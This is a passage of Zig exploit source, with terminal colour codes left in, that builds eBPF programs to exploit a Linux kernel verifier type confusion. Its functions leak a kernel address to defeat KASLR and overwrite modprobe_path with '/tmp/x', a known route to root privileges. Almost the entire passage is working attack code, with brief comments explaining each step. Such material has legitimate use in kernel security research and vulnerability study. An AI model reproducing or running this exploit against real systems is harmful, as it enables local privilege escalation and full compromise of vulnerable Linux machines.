�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mja�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0xf8�[0m�[1m�[36m/�[0m�[1m�[36m8�[0m�[1m�[37m)�[0m�[1m�[36m*�[0m�[1m�[36m3�[0m�[1m�[36m+�[0m�[1m�[36m2�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m// "exit" by skipping the rest of the program�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// search the stack for the special value�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m1�[0m�[1m�[37m..�[0m�[1m�[36m0xf8�[0m�[1m�[36m/�[0m�[1m�[36m8�[0m�[1m�[36m+�[0m�[1m�[36m1�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_i�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mi�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi16�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37m_i�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjeq�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0xf8�[0m�[1m�[36m/�[0m�[1m�[36m8�[0m�[1m�[36m-�[0m�[1m�[37mi�[0m�[1m�[37m)�[0m�[1m�[36m*�[0m�[1m�[36m3�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37minsns�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mret�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m_insns�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37moverwrite_modprobe_path�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_create�[0m�[1m�[37m(.�[0m�[1m�[37marray�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37mexploit_prologue�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[37mexploit_stack_confusion�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// type confusion of r1 (expected: fp-0x8, actual: MODPROBE_PATH)�[0m
�[1m�[37m �[0m�[37m_ld_dw1�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m_ld_dw2�[0m�[1m�[37m(�[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37m_ld_dw1�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"/tmp/x�[0m�[33m\x00�[0m�[33m"�[0m�[1m�[37m).�[0m�[1m�[36m*�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m_ld_dw2�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"/tmp/x�[0m�[33m\x00�[0m�[33m"�[0m�[1m�[37m).�[0m�[1m�[36m*�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mbpf_helper�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37minsns�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"foobar"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mkaslr_leak�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_create�[0m�[1m�[37m(.�[0m�[1m�[37marray�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m3�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37mexploit_prologue�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[37mexploit_stack_confusion�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// type confusion: r1 (expected: scalar, actual: fp)�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xdead�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x190�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m// fp-0x190, this is where the saved return address is stored�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// construct a fake skb on the stack�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m// skb->data == fp-0x110�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m(�[0m�[1m�[36m0x8�[0m�[1m�[36m+�[0m�[1m�[37m(�[0m�[1m�[36m0xb8�[0m�[1m�[36m-�[0m�[1m�[36m0x68�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[36m0x100�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m// skb->data_len == 0xcafe�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m(�[0m�[1m�[36m0x8�[0m�[1m�[36m+�[0m�[1m�[36m0xb8�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[33m// &skb�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// type confusion: r1 (expected: ctx, actual: fp-)�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr6�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mskb_load_bytes�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// the address of this instruction is now in r8-0x10�[0m
�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mCALL�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mJMP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moff�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m7�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// map[1] = &call_instruction�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd1�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd2�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mmap_update_elem�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// type confusion: r1 (expected: fp-0x8, actual: &call_instruction)�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// map[2] = call_instruction�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd1�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd2�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mmap_update_elem�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
